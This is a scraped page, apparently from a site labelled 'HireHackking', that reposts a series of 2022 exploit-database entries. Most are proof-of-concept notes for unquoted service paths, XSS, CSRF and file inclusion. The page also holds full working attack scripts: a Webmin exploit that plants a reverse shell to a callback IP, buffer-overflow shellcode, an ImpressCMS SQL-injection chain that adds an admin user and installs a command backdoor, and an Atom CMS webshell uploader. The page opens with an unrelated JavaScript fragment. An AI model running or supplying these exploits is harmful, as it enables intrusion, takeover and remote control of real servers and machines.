"?" + Math.random().toString(16).substring(2, 8).toLowerCase(); else if ("<invalid session>" == a.substr(0, 17)) a = 0 == servertype ? "login.php?logout" : "login.htm?logout", window.location = a + "?" + Math.random().toString(16).substring(2, 8).toLowerCase(); else { if (0 == servertype) return a; var c = localStorage.getItem("WXKey"); if ("" == c) return a; a = hexToStr(a); var b = a.substr(0, 16); a = a.substr(16, a.length); a = mcrypt.Decrypt(a, b, c, "rijndael-128", "cbc").replace(/\x00+$/g, ""); a = removePKCS7(a); return a = decodeURIComponent(escape(a)) }
HireHackking

ProtonVPN 1.26.0 - Unquoted Service Path

HACKER · %s · %s

# Exploit Title: ProtonVPN 1.26.0 - Unquoted Service Path # Date: 22/03/2022 # Exploit Author: gemreda (@gemredax) # Vendor Homepage: https://protonvpn.com/ # Software Link: https://protonvpn.com/ # Version: 1.26.0 # Tested: Windows 10 x64 # Contact: gemredax@pm.me PS C:\Users\Emre> sc.exe qc "ProtonVPN Wireguard" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ProtonVPN Wireguard TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Proton Technologies\ProtonVPN\ProtonVPN.WireGuardService.exe C:\ProgramData\ProtonVPN\WireGuard\ProtonVPN.conf LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : ProtonVPN WireGuard DEPENDENCIES : Nsi : TcpIp SERVICE_START_NAME : LocalSystem #Exploit: The product uses a search path that contains an unquoted element, in which the element contains whitespace or other separators. This can cause the product to access resources in a parent path. If a malicious individual has access to the file system, it is possible to elevate privileges by inserting such a file as "C:\Program.exe" to be run by a privileged program making use of WinExec.
HireHackking
# Exploit Title: Drupal avatar_uploader v7.x-1.0-beta8 - Cross Site Scripting (XSS) # Date: 2022-03-22 # Author: Milad karimi # Software Link: https://www.drupal.org/project/avatar_uploader # Version: v7.x-1.0-beta8 # Tested on: Windows 10 # CVE: N/A 1. Description: This plugin creates a avatar_uploader from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting. 2. Proof of Concept: http://$target/avatar_uploader.pages.inc?file=<script>alert("test")</script>
HireHackking
# Exploit Title: WordPress Plugin Curtain 1.0.2 - Cross-site Request Forgery (CSRF) # Date: 24-03-2022 # Exploit Author: Hassan Khan Yusufzai - Splint3r7 # Vendor Homepage: https://wordpress.org/plugins/curtain/ # Version: 1.0.2 # Tested on: Firefox ## Summary: Cross site forgery vulnerability has been identified in curtain WordPress plugin that allows an attacker to to activate or deactivate sites maintenance mode. ## Vulnerable URL: http://localhost:10003/wp-admin/options-general.php?page=curtain&_wpnonce=&mode=0 ## CSRF POC Exploit ``` <html> <body> <form action="http://localhost:10003/wp-admin/options-general.php"> <input type="hidden" name="page" value="curtain" /> <input type="hidden" name="&#95;wpnonce" value="" /> <input type="hidden" name="mode" value="0" /> <input type="submit" value="Submit request" /> </form> </body> </html> ```
HireHackking

WordPress Plugin admin-word-count-column 2.2 - Local File Read

HACKER · %s · %s

# Exploit Title: WordPress Plugin admin-word-count-column 2.2 - Local File Read # Google Dork: inurl:/wp-content/plugins/admin-word-count-column/ # Date: 27-03-2022 # Exploit Author: Hassan Khan Yusufzai - Splint3r7 # Vendor Homepage: https://wordpress.org/plugins/admin-word-count-column/ # Version: 2.2 # Contact me: h [at] spidersilk.com # PHP version: 5.3.2 or below # Vulnerable File: plugins/admin-word-count-column/download-csv.php # Vulnerable Code: ``` <?php date_default_timezone_set('America/Los_Angeles'); $csvdate = date('Md-H-i-s-T'); $csvname = 'wordcounts-' . $csvdate . '.csv'; header('Content-Type: application/csv'); header('Content-Disposition: attachment; filename=' . $csvname); header('Pragma: no-cache'); readfile($_GET['path'] . 'cpwc.csv'); ?> ``` # Proof of Concept: localhost/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0 Note: Null byte injection will only working in php 5.3.2 and below 5.3.2.
HireHackking

Webmin 1.984 - Remote Code Execution (Authenticated)

HACKER · %s · %s

# Exploit Title: Webmin 1.984 - Remote Code Execution (Authenticated) # Date: 2022-03-06 # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://www.webmin.com/ # Software Link: https://github.com/webmin/webmin/archive/refs/tags/1.984.zip # Version: <= 1.984 # Tested on: Ubuntu 18 # Reference: https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell #!/usr/bin/python3 """ Coded by: @faisalfs10x GitHub: https://github.com/faisalfs10x Reference: https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/ """ import requests import urllib3 import argparse import os import time urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) TGREEN = '\033[32m' TRED = '\033[31m' TCYAN = '\033[36m' TSHELL = '\033[32;1m' ENDC = '\033[m' class Exploit(object): def __init__(self, target, username, password, py3http_server, pyhttp_port, upload_path, callback_ip, callback_port, fname): self.target = target self.username = username self.password = password self.py3http_server = py3http_server self.pyhttp_port = pyhttp_port self.upload_path = upload_path self.callback_ip = callback_ip self.callback_port = callback_port self.fname = fname #self.proxies = proxies self.s = requests.Session() def gen_payload(self): payload = ('''perl -e 'use Socket;$i="''' + self.callback_ip + '''";$p=''' + self.callback_port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};' ''') print(TCYAN + f"\n[+] Generating payload to {self.fname} in current directory", ENDC) f = open(f"{self.fname}", "w") f.write(payload) f.close() def login(self): login_url = self.target + "/session_login.cgi" cookies = { "redirect": "1", "testing": "1", "PHPSESSID": "" } data = { 'user' : self.username, 'pass' : self.password } try: r = self.s.post(login_url, data=data, cookies=cookies, verify=False, allow_redirects=True, timeout=10) success_message = 'System hostname' if success_message in r.text: print(TGREEN + "[+] Login Successful", ENDC) else: print(TRED +"[-] Login Failed", ENDC) exit() except requests.Timeout as e: print(TRED + f"[-] Target: {self.target} is not responding, Connection timed out", ENDC) exit() def pyhttp_server(self): print(f'[+] Attempt to host http.server on {self.pyhttp_port}\n') os.system(f'(setsid $(which python3) -m http.server {self.pyhttp_port} 0>&1 & ) ') # add 2>/dev/null for clean up print('[+] Sleep 3 second to ensure http server is up!') time.sleep(3) # Sleep for 3 seconds to ensure http server is up! def download_remote_url(self): download_url = self.target + "/extensions/file-manager/http_download.cgi?module=filemin" headers = { "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Referer": self.target + "/filemin/?xnavigation=1" } data = { 'link': "http://" + self.py3http_server + "/" + self.fname, 'username': '', 'password': '', 'path': self.upload_path } r = self.s.post(download_url, data=data, headers=headers, verify=False, allow_redirects=True) print(f"\n[+] Fetching {self.fname} from http.server {self.py3http_server}") def modify_permission(self): modify_perm_url = self.target + "/extensions/file-manager/chmod.cgi?module=filemin&page=1&paginate=30" headers = { "Referer": self.target + "/filemin/?xnavigation=1" } data = { "name": self.fname, "perms": "0755", "applyto": "1", "path": self.upload_path } r = self.s.post(modify_perm_url, data=data, headers=headers, verify=False, allow_redirects=True) print(f"[+] Modifying permission of {self.fname} to 0755") def exec_revshell(self): url = self.target + '/' + self.fname try: r = self.s.get(url, verify=False, allow_redirects=True, timeout=3) except requests.Timeout as e: # check target whether make response in 3s, then it indicates shell has been spawned! print(TGREEN + f"\n[+] Success: shell spawned to {self.callback_ip} via port {self.callback_port} - XD", ENDC) print("[+] Shell location: " + url) else: print(TRED + f"\n[-] Please setup listener first and try again with: nc -lvp {self.callback_port}", ENDC) def do_cleanup(self): print(TCYAN + '\n[+] Cleaning up ') print(f'[+] Killing: http.server on port {self.pyhttp_port}') os.system(f'kill -9 $(lsof -t -i:{self.pyhttp_port})') exit() def run(self): self.gen_payload() self.login() self.pyhttp_server() self.download_remote_url() self.modify_permission() self.exec_revshell() self.do_cleanup() if __name__ == "__main__": parser = argparse.ArgumentParser(description='Webmin CVE-2022-0824 Reverse Shell') parser.add_argument('-t', '--target', type=str, required=True, help=' Target full URL, https://www.webmin.local:10000') parser.add_argument('-c', '--credential', type=str, required=True, help=' Format, user:user123') parser.add_argument('-LS', '--py3http_server', type=str, required=True, help=' Http server for serving payload, ex 192.168.8.120:8080') parser.add_argument('-L', '--callback_ip', type=str, required=True, help=' Callback IP to receive revshell') parser.add_argument('-P', '--callback_port', type=str, required=True, help=' Callback port to receive revshell') parser.add_argument("-V",'--version', action='version', version='%(prog)s 1.0') args = parser.parse_args() target = args.target username = args.credential.split(':')[0] password = args.credential.split(':')[1] py3http_server = args.py3http_server pyhttp_port = py3http_server.split(':')[1] callback_ip = args.callback_ip callback_port = args.callback_port upload_path = "/usr/share/webmin" # the default installation of Webmin Debian Package, may be in different location if installed using other method. fname = "revshell.cgi" # CGI script name, you may change to different name pwn = Exploit(target, username, password, py3http_server, pyhttp_port, upload_path, callback_ip, callback_port, fname) pwn.run()
HireHackking

Cobian Backup 0.9 - Unquoted Service Path

HACKER · %s · %s

# Exploit Title: Cobian Backup 0.9 - Unquoted Service Path # Date: 06/03/2022 # Exploit Author: Hejap Zairy # Vendor Homepage: https://www.cobiansoft.com// # Software Link: https://www.cobiansoft.com/download.php/ # Version:0.9.93 # Tested: Windows 10 Pro x64 es C:\Users\Hejap>sc qc CobianReflectorService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: CobianReflectorService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Cobian Reflector\Cobian.Reflector.Service.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Cobian Reflector Engine DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
HireHackking

Audio Conversion Wizard v2.01 - Buffer Overflow

HACKER · %s · %s

# Exploit Title: Audio Conversion Wizard v2.01 - Buffer Overflow # Exploit Author: Hejap Zairy # Date: 03.07.2022 # Software Link: https://www.litexmedia.com/acwizard.exe # Tested Version: v2.01 # Tested on: Windows 10 64bit # 1.- Run python code : 0day-Hejap_Zairy.py # 2.- Open 0day_Hejap.txt and copy All content to Clipboard # 3.- Open Audio Conversion Wizard and press Enter Code # 4.- Paste the Content of 0day_Hejap.txt into the 'Enter Code' # 5.- Click 'OK' # Author Code By Hejap Zairy #!/usr/bin/env python from pwn import * buffer = "\x41" * 1016 push_esp = p32(0x1004dbff) #push esp ret ret from id3lib.dll nops = "\x90" * 15#515 tshhh theardlooo love Malware #msfvenom --arch x64 windows/x64/shell_reverse_tcp lhost=ip lport=443 -f python -e x64/shikata_ga_nai -b "\x00\x0a\x0d\x20" #msfvenom --arch x64 -p windows/x64/messagebox TEXT="0day Hejap Zairy" -f python -e x64/shikata_ga_nai EXITFUNC=thread -b "\x00\x0a\x0d\x20" buf = b"" buf += b"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00" buf += b"\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b" buf += b"\x52\x60\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e" buf += b"\x48\x8b\x72\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" buf += b"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9" buf += b"\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x3e\x48\x8b\x52" buf += b"\x20\x3e\x8b\x42\x3c\x48\x01\xd0\x3e\x8b\x80\x88\x00" buf += b"\x00\x00\x48\x85\xc0\x74\x6f\x48\x01\xd0\x50\x3e\x8b" buf += b"\x48\x18\x3e\x44\x8b\x40\x20\x49\x01\xd0\xe3\x5c\x48" buf += b"\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9" buf += b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0" buf += b"\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd6" buf += b"\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41\x8b" buf += b"\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b" buf += b"\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41" buf += b"\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0" buf += b"\x58\x41\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff" buf += b"\x5d\x49\xc7\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a" buf += b"\x01\x00\x00\x3e\x4c\x8d\x85\x2b\x01\x00\x00\x48\x31" buf += b"\xc9\x41\xba\x45\x83\x56\x07\xff\xd5\xbb\xe0\x1d\x2a" buf += b"\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28" buf += b"\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72" buf += b"\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x30\x64\x61\x79" buf += b"\x20\x48\x65\x6a\x61\x70\x20\x5a\x61\x69\x72\x79\x00" buf += b"\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x00" padding ="C" * (len(buffer) - len(push_esp) - len(nops)) payload = buffer + push_esp + nops + buf + padding try: with open("0day_Hejap.txt","wb") as f: print("[+] Creating %s Shellcode 0day-Hejap payload.." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("[-]File cannot be created")
HireHackking

BattlEye 0.9 - 'BEService' Unquoted Service Path

HACKER · %s · %s

# Exploit Title: BattlEye 0.9 - 'BEService' Unquoted Service Path # Date: 09/03/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.battleye.com/ # Software Link: https://www.battleye.com/downloads/ # Version: 0.94 # Tested: Windows 10 Pro # Contact: https://twitter.com/dmaral3noz C:\Users\saudh>sc qc BEService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: BEService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Common Files\BattlEye\BEService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : BattlEye Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
HireHackking
# Exploit Title: Sony playmemories home - 'PMBDeviceInfoProvider' Unquoted Service Path # Date: 09/03/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.sony.com/ # Software Link: https://support.d-imaging.sony.co.jp/www/disoft/int/download/playmemories-home/win/en/index.html # Version: 6.0 # Tested: Windows 10 Pro # Contact: https://twitter.com/dmaral3noz C:\Users\saudh>sc qc PMBDeviceInfoProvider [SC] QueryServiceConfig SUCCESS SERVICE_NAME: PMBDeviceInfoProvider TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Sony\PlayMemories Home\PMBDeviceInfoProvider.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : PMBDeviceInfoProvider DEPENDENCIES : RPCSS SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
HireHackking
# Exploit Title: ICT Protege GX/WX 2.08 - Client-Side SHA1 Password Hash Disclosure # Exploit Author: LiquidWorm Vendor: Integrated Control Technology Ltd. Product web page: https://www.ict.co Affected version: GX: Ver: 2.08.1002 K1B3 Lib: 04.00.217 Int: 2.3.235.J013 OS: 2.0.20 WX: Ver: 4.00 284 H062 App: 02.08.766 Lib: 04.00.169 Int: 02.2.208 Summary: Protege GX is an enterprise level integrated access control, intrusion detection and building automation solution with a feature set that is easy to operate, simple to integrate and effortless to extend. Protege WX is an all-in-one, web-based, cross-platform system that gives you a fully functional access control and intrusion detection solution in a fraction of the time of conventional software. With no software to install, setup is quick and simple. Connect the Controller and system components, then open a web browser to launch the intuitive wizard-driven interface which guides you through the process of configuring your system. Desc: The application is vulnerable to improper access control that allows an authenticated operator to disclose SHA1 password hashes (client-side) of other users/operators. Tested on: Microsoft-WinCE/6.00 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5700 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5700.php 08.02.2022 -- Navigate to http://CONTROLLER_IP/operator.htm Source: <p><label id="OperatorPassword">Password</label><input type="password" id="Password" value="" class="narrow" readonly=""> <input type="button" id="ButtonChangeOperatorPassword" class="narrow" style="float: right; margin-right: 23%; width: auto;" onclick="updatePassword('operator');" data-multiselect="disabled" value="Change Password"></p> ... ... <input type="hidden" id="pswdsha" value="053e98c13fcbd7df3bf3a220088e19c867dfd4cc"> ...
HireHackking
# Exploit Title: WordPress Plugin amministrazione-aperta 3.7.3 - Local File Read - Unauthenticated # Google Dork: inurl:/wp-content/plugins/amministrazione-aperta/ # Date: 23-03-2022 # Exploit Author: Hassan Khan Yusufzai - Splint3r7 # Vendor Homepage: https://wordpress.org/plugins/amministrazione-aperta/ # Version: 3.7.3 # Tested on: Firefox # Vulnerable File: dispatcher.php # Vulnerable Code: ``` if ( isset($_GET['open']) ) { include(ABSPATH . 'wp-content/plugins/'.$_GET['open']); } else { echo ' <div id="welcome-panel" class="welcome-panel" style="padding-bottom: 20px;"> <div class="welcome-panel-column-container">'; include_once( ABSPATH . WPINC . '/feed.php' ); ``` # Proof of Concept: localhost/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=[LFI]
HireHackking

ImpressCMS 1.4.2 - Remote Code Execution (RCE)

HACKER · %s · %s

# Exploit Title: ImpressCMS 1.4.2 - Remote Code Execution (RCE) # Exploit Author: Egidio Romano aka EgiX # Date: 30/03/2022 # Version: <= 1.4.2 # Venor: https://www.impresscms.org # CVE: CVE-2021-26599 <?php /* ---------------------------------------------------------- ImpressCMS <= 1.4.2 SQL Injection to Remote Code Execution ---------------------------------------------------------- author..............: Egidio Romano aka EgiX mail................: n0b0d13s[at]gmail[dot]com software link.......: https://www.impresscms.org +-------------------------------------------------------------------------+ | This proof of concept code was written for educational purpose only. | | Use it at your own risk. Author will be not responsible for any damage. | +-------------------------------------------------------------------------+ [-] Vulnerability Description: User input passed through the "groups" POST parameter to the /include/findusers.php script is not properly sanitized before being passed to the icms_member_Handler::getUserCountByGroupLink() and icms_member_Handler::getUsersByGroupLink() methods. These methods use the first argument to construct a SQL query without proper validation, and this can be exploited by remote attackers to e.g. read sensitive data from the "users" database table through boolean-based SQL Injection attacks. The application uses PDO as a database driver, which allows for stacked SQL queries, as such this vulnerability could be exploited to e.g. create a new admin user and execute arbitrary PHP code. [-] CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2021-26599 to this vulnerability. [-] Disclosure timeline: [19/01/2021] - Vendor notified through HackerOne [29/01/2021] - Vulnerability acknowledged by the vendor [03/02/2021] - CVE number assigned [06/02/2022] - Version 1.4.3 released, vulnerability not correctly fixed [11/02/2022] - Vendor was informed about the ineffective fix [09/03/2022] - Version 1.4.4 released [22/03/2022] - Public disclosure [-] Technical writeup: http://karmainsecurity.com/impresscms-from-unauthenticated-sqli-to-rce */ set_time_limit(0); error_reporting(E_ERROR); if (!extension_loaded("curl")) die("[-] cURL extension required!\n"); function hex_enc($input) { for ($i = 0; $i < strlen($input); $i++) $encoded .= sprintf("%02x", ord($input[$i])); return "0x{$encoded}"; } print "+-----------------------------------------------------------+\n"; print "| ImpressCMS <= 1.4.2 Remote Code Execution Exploit by EgiX |\n"; print "+-----------------------------------------------------------+\n"; if ($argc != 2) { print "\nUsage: php $argv[0] <URL>"; print "\nExample.: php $argv[0] http://localhost/impresscms/"; print "\nExample.: php $argv[0] https://www.impresscms.org/\n\n"; die(); } $url = $argv[1]; $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); print "\n[+] Retrieving security token (CVE-2021-26598)\n"; curl_setopt($ch, CURLOPT_URL, "{$url}misc.php?action=showpopups&type=friend"); $res = curl_exec($ch); if (!preg_match("/(cookie: [^;]+); path/i", $res, $sid)) die("[-] Session coookie not found!\n"); if (!preg_match("/TOKEN_REQUEST' value='([^']+)'/", $res, $token)) die("[-] Token not found!\n"); print "[+] Starting SQL Injection attack (CVE-2021-26599)\n"; print "[*] Step 1: retrieving database name\n"; curl_setopt($ch, CURLOPT_URL, "{$url}include/findusers.php"); curl_setopt($ch, CURLOPT_HTTPHEADER, [$sid[1]]); $params = "user_submit=1&token={$token[1]}&groups[]=%s"; $min = true; $idx = 1; while(1) { $test = 256; for ($i = 7; $i >= 0; $i--) { $test = $min ? ($test - pow(2, $i)) : ($test + pow(2, $i)); $sql = "1) AND ORD(SUBSTR(DATABASE(),{$idx},1))<{$test}#"; curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql))); $min = !preg_match("/No Users Found/", curl_exec($ch)); } if (($chr = $min ? ($test - 1) : ($test)) == 0) break; $dbname .= chr($chr); $min = true; $idx++; print "\r[+] DB name: {$dbname}"; } print "\n[*] Step 2: retrieving tables prefix\n"; $sub = "SELECT TRIM(TRAILING 'users' FROM table_name) FROM information_schema.tables WHERE table_schema='{$dbname}' AND table_name LIKE '%users'"; $min = true; $idx = 1; while(1) { $test = 256; for ($i = 7; $i >= 0; $i--) { $test = $min ? ($test - pow(2, $i)) : ($test + pow(2, $i)); $sql = hex_enc("SELECT IF(ORD(SUBSTR(({$sub}),{$idx},1))<{$test},1,SLEEP(1))"); $sql = "0); SET @q = {$sql}; PREPARE stmt FROM @q; EXECUTE stmt;#"; curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql))); $start = time(); curl_exec($ch); $secs = time() - $start; $min = ($secs < 2); } if (($chr = $min ? ($test - 1) : ($test)) == 0) break; $prefix .= chr($chr); $min = true; $idx++; print "\r[+] Prefix: {$prefix}"; } print "\n[*] Step 3: creating new admin user\n"; $uid = time(); $enc = hex_enc("egix"); $pwd = hex_enc(md5("egix")); $sql = "0); INSERT INTO {$prefix}users (uid, uname, login_name, pass, level, enc_type) VALUES ({$uid}, {$enc}, {$enc}, {$pwd}, 5, 0)#"; curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql))); curl_exec($ch); $sql = "0); INSERT INTO {$prefix}groups_users_link (groupid, uid) VALUES (1, {$uid})#"; curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql))); curl_exec($ch); print "[+] Trying to login as the new user\n"; curl_setopt($ch, CURLOPT_URL, "{$url}user.php"); curl_setopt($ch, CURLOPT_POSTFIELDS, "uname=egix&pass=egix&op=login"); if (!preg_match("/(cookie: [^;]+); path/i", curl_exec($ch), $sid)) die("[-] Login failed!\n"); print "[+] Creating malicious autotask\n"; $phpcode = urlencode("if (isset(\$_SERVER[HTTP_CMD])) { print(____); passthru(base64_decode(\$_SERVER[HTTP_CMD])); die; }"); curl_setopt($ch, CURLOPT_URL, "{$url}modules/system/admin.php"); curl_setopt($ch, CURLOPT_HTTPHEADER, [$sid[1], "Referer: {$url}"]); curl_setopt($ch, CURLOPT_POSTFIELDS, "fct=autotasks&sat_name=rce&sat_code={$phpcode}&sat_enabled=1&op=addautotasks"); if (!preg_match("/HTTP.*302/i", curl_exec($ch))) die("[-] Something went wrong!\n"); print "[+] Launching shell\n"; curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, false); while(1) { print "\nimpresscms-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".base64_encode($cmd)]); preg_match('/____(.*)/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); }
HireHackking

Atom CMS 2.0 - Remote Code Execution (RCE)

HACKER · %s · %s

# Exploit Title: Atom CMS 2.0 - Remote Code Execution (RCE) # Date: 22.03.2022 # Exploit Author: Ashish Koli (Shikari) # Vendor Homepage: https://thedigitalcraft.com/ # Software Link: https://github.com/thedigicraft/Atom.CMS # Version: 2.0 # Tested on: Ubuntu 20.04.3 LTS # CVE: CVE-2022-25487 # Description This script uploads webshell.php to the Atom CMS. An application will store that file in the uploads directory with a unique number which allows us to access Webshell. # Usage : python3 exploit.py <IP> <Port> <atomcmspath> # Example: python3 exploit.py 127.0.0.1 80 /atom # POC Exploit: https://youtu.be/qQrq-eEpswc # Note: Crafted "Shell.txt" file is required for exploitation which is available on the below link: # https://github.com/shikari00007/Atom-CMS-2.0---File-Upload-Remote-Code-Execution-Un-Authenticated-POC ''' Description: A file upload functionality in Atom CMS 2.0 allows any non-privileged user to gain access to the host through the uploaded files, which may result in remote code execution. ''' #!/usr/bin/python3 ''' Import required modules: ''' import sys import requests import json import time import urllib.parse import struct import re import string import linecache proxies = { 'http': 'http://localhost:8080', 'https': 'https://localhost:8080', } ''' User Input: ''' target_ip = sys.argv[1] target_port = sys.argv[2] atomcmspath = sys.argv[3] ''' Get cookie ''' session = requests.Session() link = 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin' response = session.get(link) cookies_session = session.cookies.get_dict() cookie = json.dumps(cookies_session) cookie = cookie.replace('"}','') cookie = cookie.replace('{"', '') cookie = cookie.replace('"', '') cookie = cookie.replace(" ", '') cookie = cookie.replace(":", '=') ''' Upload Webshell: ''' # Construct Header: header1 = { 'Host': target_ip, 'Accept': 'application/json', 'Cache-Control': 'no-cache', 'X-Requested-With': 'XMLHttpRequest', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36', 'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryH7Ak5WhirAIQ8o1L', 'Origin': 'http://' + target_ip, 'Referer': 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin/index.php?page=users&id=1', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.9', 'Cookie': cookie, 'Connection': 'close', } # loading Webshell payload: path = 'shell.txt' fp = open(path,'rb') data= fp.read() # Uploading Webshell: link_upload = 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin/uploads.php?id=1' upload = requests.post(link_upload, headers=header1, data=data) p=upload.text x = re.sub("\s", "\n", p) y = x.replace("1<br>Unknown", "null") z = re.sub('[^0-9]', '', y) ''' Finish: ''' print('Uploaded Webshell to: http://' + target_ip + ':' + target_port + atomcmspath + '/uploads/' + z + '.php') print('')
HireHackking

WordPress Plugin cab-fare-calculator 1.0.3 - Local File Inclusion

HACKER · %s · %s

# Exploit Title: WordPress Plugin cab-fare-calculator 1.0.3 - Local File Inclusion # Google Dork: inurl:/wp-content/plugins/cab-fare-calculator/ # Date: 24-03-2022 # Exploit Author: Hassan Khan Yusufzai - Splint3r7 # Vendor Homepage: https://wordpress.org/plugins/cab-fare-calculator/ # Version: 1.0.3 # Tested on: Firefox # Vulnerable File: tblight.php # Impact: Local File Read / Code Execution # Vulnerable Code: ``` if(!empty($_GET['controller']) && !empty($_GET['action']) && !empty($_GET['ajax']) && $_GET['ajax'] == 1) { require_once('' . 'controllers/'.$_GET['controller'].'.php'); } ``` # Proof of concept: http://localhost:10003/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/index&action=1&ajax=1 # POC Code Execution: /etc/index.php: <?php echo "Local file read"; phpinfo(); ?>